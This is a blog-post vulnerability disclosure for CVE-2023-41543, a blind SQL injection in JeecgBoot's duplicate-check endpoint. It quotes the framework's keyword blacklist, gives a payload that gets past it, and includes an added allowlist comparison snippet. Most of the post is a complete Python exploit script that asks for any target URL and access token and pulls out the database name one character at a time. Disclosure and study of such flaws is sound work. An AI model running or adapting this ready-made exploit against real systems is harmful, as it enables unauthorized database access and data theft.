CVE-2023-41543(JeecgBoot Sql Injection)

Description

JEECG Boot v3.5.3 was discovered to contain a SQL injection in /sys/replicate/check.

Affected version

JeecgBoot <= v3.5.3

Vulnerability Analysis

The framework mitigates the original SQL injection by adding a keyword blacklist. The blacklist is as follows:

“exec|peformance_schema|information_schema|extractvalue|updatexml|geohash|gtid_subset|gtid_subtract| insert | alter | delete | grant | update | drop | chr | mid | master | truncate | char | declare |user()|”;

Therefore, it is possible to construct payloads that use none of the blacklisted terms and so bypass the existing protective measures, as I mentioned in the report:

1 'having {ascii}=(nullif (ascii (substring ((select database()), {place}, 1)), 0) or'
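Why a keyword blacklist is the wrong control for this parameter, as an added illustration that is not part of the original write-up: the blacklist quoted above is reproduced and modelled as a case-insensitive substring check (an assumption about how the framework applies it), then compared with an allowlist that accepts only a bare column identifier, which is all a fieldName ever needs to be. The sample inputs are constructed.

```python
import re

# Blacklist string quoted in the write-up for JeecgBoot <= v3.5.3 (terms separated by "|").
BLACKLIST = ("exec|peformance_schema|information_schema|extractvalue|updatexml|geohash|"
             "gtid_subset|gtid_subtract| insert | alter | delete | grant | update | drop |"
             " chr | mid | master | truncate | char | declare |user()|")
BLACKLIST_TERMS = [t for t in BLACKLIST.split("|") if t]


def blacklist_rejects(value: str) -> bool:
    """Keyword blacklist, modelled (assumption) as a case-insensitive substring match."""
    lowered = value.lower()
    return any(term in lowered for term in BLACKLIST_TERMS)


# A fieldName is only ever a column name, so a plain SQL identifier is all that should pass.
IDENTIFIER = re.compile(r"[A-Za-z_][A-Za-z0-9_]{0,63}")


def allowlist_accepts(value: str) -> bool:
    """Allowlist: accept a bare identifier, reject anything with spaces, quotes or parentheses."""
    return IDENTIFIER.fullmatch(value) is not None


def classify(value: str) -> dict:
    """Run one fieldName value through both checks for a side-by-side comparison."""
    return {"blacklist_rejects": blacklist_rejects(value),
            "allowlist_accepts": allowlist_accepts(value)}


# Constructed inputs: a legitimate column name, a value hitting the blacklist, and the
# page's bypass payload, which contains no blacklisted term yet is clearly not a column name.
SAMPLES = {
    "legit": "username",
    "blacklisted": "1 or updatexml(1,1,1)",
    "bypass": "1 having 32<(nullif(ascii((substring((select database()),1,1))),0)) ",
}

if __name__ == "__main__":
    for name, value in SAMPLES.items():
        print(name, classify(value))
```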

Exp

The complete exploit script is as follows:

import requests
import json


def get_database(url, token):
    # Vulnerable endpoint; the injection point is the unvalidated fieldName parameter
    url = url + "/jeecg-boot/sys/duplicate/check?tableName=v3_hello&fieldVal=1&dataId=asd&fieldName="
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0',
        'Accept': 'application/json, text/plain, */*',
        'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
        'Referer': 'http://localhost:8088/jeecg-boot/jmreport/list',
        'X-Access-Token': 'null',
        'token': 'null',
        'JmReport-Tenant-Id': 'null',
        'Content-Type': 'application/json',
        'Connection': 'close',
        'Sec-Fetch-Dest': 'empty',
        'Sec-Fetch-Mode': 'no-cors',
        'Sec-Fetch-Site': 'same-origin',
        'Pragma': 'no-cache',
        'Cache-Control': 'no-cache'
    }
    headers["X_ACCESS_TOKEN"] = token

    # Step 1: determine the length of the database name, one position at a time
    length = 1
    while True:
        payload = f"1 having 32<(nullif(ascii((substring((select database()),{length},1))),0)) "
        response = requests.get(url + payload, headers=headers)
        res = json.loads(response.text)
        if res["code"] != "200":
            break
        else:
            length += 1

    # Step 2: binary-search the ASCII value of each character between 32 and 127
    database = ""
    for place in range(1, length):
        min = 32
        max = 128
        mid = (min + max) // 2
        while min < max:
            payload = f"1 having {mid}<(nullif(ascii((substring((select database()),{place},1))),0)) "
            response = requests.get(url + payload, headers=headers)
            res = json.loads(response.text)
            if res["code"] == "200":
                min = mid + 1
            else:
                max = mid
            mid = (min + max) // 2
        database += chr(mid)
        print(database)


# get_database("http://localhost:8088","")
url = input("please input your target: (example:http://localhost:8088)")
token = input("please input your X_ACCESS_TOKEN: ")
get_database(url, token)

https://pho3n1x-web.github.io/2023/09/18/CVE-2023-41543(JeecgBoot_sql)/
Author
Pho3n1x
Posted on
September 18, 2023